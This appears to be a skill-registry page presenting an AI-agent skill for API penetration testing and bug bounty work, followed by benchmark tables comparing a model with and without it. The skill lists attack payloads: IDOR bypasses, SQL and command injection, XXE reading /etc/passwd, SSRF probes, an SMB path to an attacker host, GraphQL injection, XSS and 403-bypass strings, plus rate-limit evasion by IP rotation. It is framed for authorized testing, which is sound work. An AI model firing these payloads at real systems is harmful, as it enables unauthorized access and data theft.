Install any skill in seconds. Free to start, no credit card required.
Get Started Free →Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.
.claude/skills/api-fuzzing-bug-bounty/SKILL.md| Test case | Without → With | Effect | Δ tokens | Δ turns |
|---|---|---|---|---|
| case-16 | ✗→✓ | ▲ Improved | 104% | 0% |
| case-17 | ✗→✓ | ▲ Improved | 331% | 0% |
| case-19 | ✗→✓ | ▲ Improved | 306% | 0% |
| case-05 | ✓→✓ | = Same ✓ | 192% | 0% |
| case-07 | ✓→✓ | = Same ✓ | 126% | 0% |
> ⚠️ AUTHORIZED USE ONLY > This skill is for educational purposes or authorized security assessments only. > You must have explicit, written permission from the system owner before using this tool. > Misuse of this tool is illegal and strictly prohibited.
> Mandatory confirmation gate > Before running any command that probes, exploits, changes, persists on, extracts data from, or attempts credential access against a target: > 1. Ask the user to state the exact target URL, IP, account, or resource. > 2. Ask the user to confirm written authorization and the permitted scope. > 3. Show the exact command(s) and explain their expected effect. > 4. Wait for explicit confirmation in the current conversation. > > Without that confirmation, remain read-only and provide defensive guidance only. Prefer a sandbox, disposable VM, or controlled lab.
> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.
Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.
| Type | Protocol | Data Format | Structure | |------|----------|-------------|-----------| | SOAP | HTTP | XML | Header + Body | | REST | HTTP | JSON/XML/URL | Defined endpoints | | GraphQL | HTTP | Custom Query | Single endpoint |
Identify API type and enumerate endpoints:
bash# Check for Swagger/OpenAPI documentation /swagger.json /openapi.json /api-docs /v1/api-docs /swagger-ui.html # Use Kiterunner for API discovery kr scan https://target.com -w routes-large.kite # Extract paths from Swagger python3 json2paths.py swagger.json
bash# Test different login paths /api/mobile/login /api/v3/login /api/magic_link /api/admin/login # Check rate limiting on auth endpoints # If no rate limit → brute force possible # Test mobile vs web API separately # Don't assume same security controls
Insecure Direct Object Reference is the most common API vulnerability:
bash# Basic IDOR GET /api/users/1234 → GET /api/users/1235 # Even if ID is email-based, try numeric /?user_id=111 instead of /?user_id=user@mail.com # Test /me/orders vs /user/654321/orders
IDOR Bypass Techniques:
bash# Wrap ID in array {"id":111} → {"id":[111]} # JSON wrap {"id":111} → {"id":{"id":111}} # Send ID twice URL?id=<LEGIT>&id=<VICTIM> # Wildcard injection {"user_id":"*"} # Parameter pollution /api/get_profile?user_id=<victim>&user_id=<legit> {"user_id":<legit_id>,"user_id":<victim_id>}
SQL Injection in JSON:
json{"id":"56456"} → OK {"id":"56456 AND 1=1#"} → OK {"id":"56456 AND 1=2#"} → OK {"id":"56456 AND 1=3#"} → ERROR (vulnerable!) {"id":"56456 AND sleep(15)#"} → SLEEP 15 SEC
Command Injection:
bash# Ruby on Rails ?url=Kernel#open → ?url=|ls # Linux command injection api.url.com/endpoint?name=file.txt;ls%20/
XXE Injection:
xml<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
SSRF via API:
html<object data="http://127.0.0.1:8443"/> <img src="http://127.0.0.1:445"/>
.NET Path.Combine Vulnerability:
bash# If .NET app uses Path.Combine(path_1, path_2) # Test for path traversal https://example.org/download?filename=a.png https://example.org/download?filename=C:\inetpub\wwwroot\web.config https://example.org/download?filename=\\smb.dns.attacker.com\a.png
bash# Test all HTTP methods GET /api/v1/users/1 POST /api/v1/users/1 PUT /api/v1/users/1 DELETE /api/v1/users/1 PATCH /api/v1/users/1 # Switch content type Content-Type: application/json → application/xml
Fetch entire backend schema:
graphql{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
URL-encoded version:
/graphql?query={__schema{types{name,kind,description,fields{name}}}}graphql# Try accessing other user IDs query { user(id: "OTHER_USER_ID") { email password creditCard } }
graphqlmutation { login(input: { email: "test' or 1=1--" password: "password" }) { success jwt } }
graphqlmutation {login(input:{email:"a@example.com" password:"password"}){success jwt}} mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}} mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}
graphqlquery { posts { comments { user { posts { comments { user { posts { ... } } } } } } } }
bash# XSS via GraphQL endpoint http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}} # URL-encoded XSS http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E
| Tool | Purpose | |------|---------| | GraphCrawler | Schema discovery | | graphw00f | Fingerprinting | | clairvoyance | Schema reconstruction | | InQL | Burp extension | | GraphQLmap | Exploitation |
When receiving 403/401, try these bypasses:
bash# Original blocked request /api/v1/users/sensitivedata → 403 # Bypass attempts /api/v1/users/sensitivedata.json /api/v1/users/sensitivedata? /api/v1/users/sensitivedata/ /api/v1/users/sensitivedata?? /api/v1/users/sensitivedata%20 /api/v1/users/sensitivedata%09 /api/v1/users/sensitivedata# /api/v1/users/sensitivedata&details /api/v1/users/..;/sensitivedata
html<!-- LFI via PDF export --> <iframe src="file:///etc/passwd" height=1000 width=800> <!-- SSRF via PDF export --> <object data="http://127.0.0.1:8443"/> <!-- Port scanning --> <img src="http://127.0.0.1:445"/> <!-- IP disclosure --> <img src="https://iplogger.com/yourcode.gif"/>
bash# Normal request /api/news?limit=100 # DoS attempt /api/news?limit=9999999999
| Vulnerability | Description | |---------------|-------------| | API Exposure | Unprotected endpoints exposed publicly | | Misconfigured Caching | Sensitive data cached incorrectly | | Exposed Tokens | API keys/tokens in responses or URLs | | JWT Weaknesses | Weak signing, no expiration, algorithm confusion | | IDOR / BOLA | Broken Object Level Authorization | | Undocumented Endpoints | Hidden admin/debug endpoints | | Different Versions | Security gaps in older API versions | | Rate Limiting | Missing or bypassable rate limits | | Race Conditions | TOCTOU vulnerabilities | | XXE Injection | XML parser exploitation | | Content Type Issues | Switching between JSON/XML | | HTTP Method Tampering | GET→DELETE/PUT abuse |
| Vulnerability | Test Payload | Risk | |---------------|--------------|------| | IDOR | Change user_id parameter | High | | SQLi | ' OR 1=1-- in JSON | Critical | | Command Injection | ; ls / | Critical | | XXE | DOCTYPE with ENTITY | High | | SSRF | Internal IP in params | High | | Rate Limit Bypass | Batch requests | Medium | | Method Tampering | GET→DELETE | High |
| Category | Tool | URL | |----------|------|-----| | API Fuzzing | Fuzzapi | github.com/Fuzzapi/fuzzapi | | API Fuzzing | API-fuzzer | github.com/Fuzzapi/API-fuzzer | | API Fuzzing | Astra | github.com/flipkart-incubator/Astra | | API Security | apicheck | github.com/BBVA/apicheck | | API Discovery | Kiterunner | github.com/assetnote/kiterunner | | API Discovery | openapi_security_scanner | github.com/ngalongc/openapi_security_scanner | | API Toolkit | APIKit | github.com/API-Security/APIKit | | API Keys | API Guesser | api-guesser.netlify.app | | GUID | GUID Guesser | gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18 | | GraphQL | InQL | github.com/doyensec/inql | | GraphQL | GraphCrawler | github.com/gsmith257-cyber/GraphCrawler | | GraphQL | graphw00f | github.com/dolevf/graphw00f | | GraphQL | clairvoyance | github.com/nikitastupin/clairvoyance | | GraphQL | batchql | github.com/assetnote/batchql | | GraphQL | graphql-cop | github.com/dolevf/graphql-cop | | Wordlists | SecLists | github.com/danielmiessler/SecLists | | Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io/Swagger-EZ | | Swagger Routes | swagroutes | github.com/amalmurali47/swagroutes | | API Mindmap | MindAPI | dsopas.github.io/MindAPI/play | | JSON Paths | json2paths | github.com/s0md3v/dump/tree/master/json2paths |
Must:
Must Not:
Should:
X-Requested-With: XMLHttpRequest header to simulate frontendbash# Original request (own data) GET /api/v1/invoices/12345 Authorization: Bearer <token> # Modified request (other user's data) GET /api/v1/invoices/12346 Authorization: Bearer <token> # Response reveals other user's invoice data
bashcurl -X POST https://target.com/graphql \ -H "Content-Type: application/json" \ -d '{"query":"{__schema{types{name,fields{name}}}}"}'
| Issue | Solution | |-------|----------| | API returns nothing | Add X-Requested-With: XMLHttpRequest header | | 401 on all endpoints | Try adding ?user_id=1 parameter | | GraphQL introspection disabled | Use clairvoyance for schema reconstruction | | Rate limited | Use IP rotation or batch requests | | Can't find endpoints | Check Swagger, archive.org, JS files |
This skill is applicable to execute the workflow or actions described in the overview.
| Case | Status | Duration (ms) | Turns | Tokens | Tool calls | ||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Without | With | Δ | Without | With | Δ | Without | With | Δ | Without | With | Δ | ||
case-01 | fail→fail | 11,502 | 12,488 | +9% | 1 | 1 | 0% | 1,339 | 4,891 | +265% | 0 | 0 | — |
case-02 | fail→fail | 7,512 | 12,884 | +72% | 1 | 1 | 0% | 665 | 4,831 | +626% | 0 | 0 | — |
case-03 | fail→fail | 9,235 | 13,767 | +49% | 1 | 1 | 0% | 900 | 4,941 | +449% | 0 | 0 | — |
case-04 | fail→fail | 11,228 | 15,202 | +35% | 1 | 1 | 0% | 1,147 | 5,050 | +340% | 0 | 0 | — |
case-05 | pass→pass | 9,019 | 3,893 | -57% | 1 | 1 | 0% | 1,364 | 3,979 | +192% | 0 | 0 | — |
case-06 | fail→fail | 15,935 | 15,154 | -5% | 1 | 1 | 0% | 1,495 | 4,709 | +215% | 0 | 0 | — |
case-07 | pass→pass | 12,001 | 5,749 | -52% | 1 | 1 | 0% | 1,863 | 4,215 | +126% | 0 | 0 | — |
case-08 | pass→pass | 12,437 | 8,810 | -29% | 1 | 1 | 0% | 2,118 | 4,842 | +129% | 0 | 0 | — |
case-09 | fail→fail | 12,062 | 13,572 | +13% | 1 | 1 | 0% | 1,250 | 4,879 | +290% | 0 | 0 | — |
case-10 | pass→pass | 22,001 | 7,910 | -64% | 1 | 1 | 0% | 2,161 | 4,683 | +117% | 0 | 0 | — |
case-11 | pass→pass | 16,218 | 13,277 | -18% | 1 | 1 | 0% | 2,667 | 5,409 | +103% | 0 | 0 | — |
case-12 | pass→pass | 13,302 | 7,859 | -41% | 1 | 1 | 0% | 2,068 | 4,517 | +118% | 0 | 0 | — |
case-13 | fail→fail | 5,936 | 6,830 | +15% | 1 | 1 | 0% | 535 | 3,924 | +633% | 0 | 0 | — |
case-14 | fail→fail | 21,242 | 17,672 | -17% | 1 | 1 | 0% | 1,261 | 5,000 | +297% | 0 | 0 | — |
case-15 | fail→fail | 15,994 | 13,499 | -16% | 1 | 1 | 0% | 1,580 | 4,702 | +198% | 0 | 0 | — |
case-16 | fail→pass | 12,163 | 7,264 | -40% | 1 | 1 | 0% | 2,328 | 4,759 | +104% | 0 | 0 | — |
case-17 | fail→pass | 6,458 | 8,837 | +37% | 1 | 1 | 0% | 1,145 | 4,940 | +331% | 0 | 0 | — |
case-18 | pass→pass | 12,465 | 7,019 | -44% | 1 | 1 | 0% | 2,075 | 4,494 | +117% | 0 | 0 | — |
case-19 | fail→pass | 6,912 | 10,424 | +51% | 1 | 1 | 0% | 1,292 | 5,241 | +306% | 0 | 0 | — |
case-20 | pass→pass | 22,317 | 12,043 | -46% | 1 | 1 | 0% | 3,437 | 5,416 | +58% | 0 | 0 | — |
case-21 | pass→pass | 12,211 | 9,120 | -25% | 1 | 1 | 0% | 2,388 | 5,007 | +110% | 0 | 0 | — |
case-22 | pass→pass | 16,893 | 10,261 | -39% | 1 | 1 | 0% | 2,871 | 5,019 | +75% | 0 | 0 | — |
DecimalAI ran this skill against gemini-3.6-flash twice over the same eval suite — once with the skill loaded and once without — and compared the two runs case by case. 22 cases were attempted. The headline lift of +14 percentage points is the difference between those two pass rates over the 22 comparable cases.
Without the skill loaded, the model failed this case. With it loaded, the same prompt on the same model passed. This is one improved case from the latest verified run; every case, including any that regressed, is in the table above.
| Model | Method | Date | Lift |
|---|---|---|---|
| gemini-3.6-flash | verified | 7/28/2026 | +36% |
Other measured skills in the registry, with their headline benchmark lift.